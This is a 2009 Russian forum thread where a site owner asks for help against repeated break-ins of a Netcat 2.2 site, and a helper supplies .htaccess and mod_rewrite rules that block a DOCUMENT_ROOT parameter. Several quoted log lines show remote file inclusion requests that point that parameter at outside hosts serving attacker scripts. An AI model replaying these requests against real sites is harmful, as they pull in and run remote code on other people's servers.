|
|
03.08.2009, 19:46
|
|
sleg
Зарегистрирован:
2009-04-06
Сообщений: 5
|
Есть сайт на Netcat Small Business 2.2 (Последнее установленное обновление:№223)
Последние два дня его упорно пытаются сломать. Хостер говорит о том что идет заливка шела и уже через него запуск вредоносных программ. (есть список запускаемых процессов, но мне они ни о чем не говорят.
Пытался обновиться вот здесь http://netcat.ru/forclients/update/Patches/sb.html но система выдает ошибки.
Скажите как можно это исправить?
|
|
|
04.08.2009, 12:18
|
|
DiGGy
DiGGy
Зарегистрирован:
2005-04-04
Сообщений: 1546
|
На счет обновлений ничего не скажу, не уверен, что неткет как-то поддерживает 2.2.
Версии 2.2 ломались легко путем подставления в систему пхп скриптов через переменную DOCUMENT_ROOT, в лог файле веб-сервера это выглядит вот так:
Код:190.226.148.20 - - [26/May/2009:23:54:40 +0400] "GET /map/e404.php?DOCUMENT_ROOT=http://64.32.13.142/spread.txt? HTTP/1.0" 200 - "-" "Mozilla/3.0 (compatible; Indy Library)"
151.82.39.237 - - [27/May/2009:02:11:47 +0400] "GET /e404.php?DOCUMENT_ROOT=http://questoeilmiosito.altervista.org/nitro.txt?? HTTP/1.0" 200 83289 "-" "Mozilla/3.0 (compatible; Indy Library)"
для избежания этого в файл .htaccess допишите строки:
Код:
SetEnvIfNoCase Request_URI "DOCUMENT_ROOT" bad_bot
<Limit GET POST HEAD>
Order Allow,Deny
Allow from all
Deny from env=bad_bot
</Limit>
Temet nosce...
|
|
|
04.08.2009, 20:08
|
|
sleg
Зарегистрирован:
2009-04-06
Сообщений: 5
|
спасибо. попробую, может поможет, но в логах сайта я не нашел таких строк. там на удивления вобщем ничего подозрительного нет.
суть изменнений на сайте сводится к тому что удаляют или добавляют файлы папки require, или заливают свои папки со скрипати на ftp.
|
|
|
04.08.2009, 21:34
|
|
Гость
Гость
|
sleg писал(а):в логах сайта я не нашел таких строк
Это вполне могло произойти несколько лет назад.
|
|
|
06.08.2009, 14:19
|
|
sleg
Зарегистрирован:
2009-04-06
Сообщений: 5
|
Посмотрел логи, и вот что обнаружил - сначала идет взлом файла s_loadenv.inc.php через запрос:
Код:66.110.122.197 - - [05/Aug/2009:00:49:51 +0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hanyeong.ac.kr//bbs//data/honey.gif??? HTTP/1.0" 404 4250 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
идет порядка 100 таких запросов, в различных вариантах, с отсылкой на различные сайты, потом идет взлом e404.php через такой же запрос:
Код:174.143.240.203 - - [05/Aug/2009:04:53:08 +0400] "GET /e404.php?DOCUMENT_ROOT=http://www.hit168.com.cn/idanyar.txt??? HTTP/1.0" 404 4250 "-" "libwww-perl/5.805"
далее идет смена CHMOD, потом идет заливка файлов в корневую директорию и в директорию require ну а далее запуск скриптов рассылки и прочей гадости.
ПОМОГИТЕ ПОЖАЛУЙСТА! Я уже не знаю чего делать, 4-й день подряд ломают сайт, я делаю, они ломают...
|
|
|
06.08.2009, 15:44
|
|
DiGGy
DiGGy
Зарегистрирован:
2005-04-04
Сообщений: 1546
|
Я черным по белому написал!!! Вы ЭТО сделали?
DiGGy писал(а):
для избежания этого в файл .htaccess допишите строки:
Код:
SetEnvIfNoCase Request_URI "DOCUMENT_ROOT" bad_bot
<Limit GET POST HEAD>
Order Allow,Deny
Allow from all
Deny from env=bad_bot
</Limit>
Temet nosce...
|
|
|
07.08.2009, 01:37
|
|
sleg
Зарегистрирован:
2009-04-06
Сообщений: 5
|
ДА! Сделал, не помогло.
|
|
|
09.08.2009, 22:56
|
|
DiGGy
DiGGy
Зарегистрирован:
2005-04-04
Сообщений: 1546
|
Выложите на форум содержание своего файла .htaccess из директории, где присутствует каталог /netcat/
Temet nosce...
|
|
|
16.08.2009, 02:03
|
|
sleg
Зарегистрирован:
2009-04-06
Сообщений: 5
|
Код:DirectoryIndex index.php
ErrorDocument 404 /netcat/require/e404.php
SetEnv PHPRC "/www/www.magicity.ru/path/to/php_ini/"
<ifModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-l
RewriteRule ^(.+)$ /netcat/require/e404.php?REQUEST_URI=$1 [L,QSA]
</ifModule>
SetEnvIfNoCase Request_URI "DOCUMENT_ROOT" bad_bot
<Limit GET POST HEAD>
Order Allow,Deny
Allow from all
Deny from env=bad_bot
</Limit>
|
|
|
17.08.2009, 15:50
|
|
Гость
Гость
|
фыв
|
|
|
24.08.2009, 00:48
|
|
DiGGy
DiGGy
Зарегистрирован:
2005-04-04
Сообщений: 1546
|
Извиняюсь, ввел Вас в заблуждение. В Вашем случае надо дописать то что красным выделено:
Код:DirectoryIndex index.php
ErrorDocument 404 /netcat/require/e404.php
SetEnv PHPRC "/www/www.magicity.ru/path/to/php_ini/"
<ifModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-l
RewriteRule ^(.+)$ /netcat/require/e404.php?REQUEST_URI=$1 [L,QSA]
# запрет доступа для всех запросов, содержащий переменную DOCUMENT_ROOT
RewriteCond %{QUERY_STRING} DOCUMENT_ROOT= [NC]
RewriteRule ^.*$ - [F]
</ifModule>
Temet nosce...
|
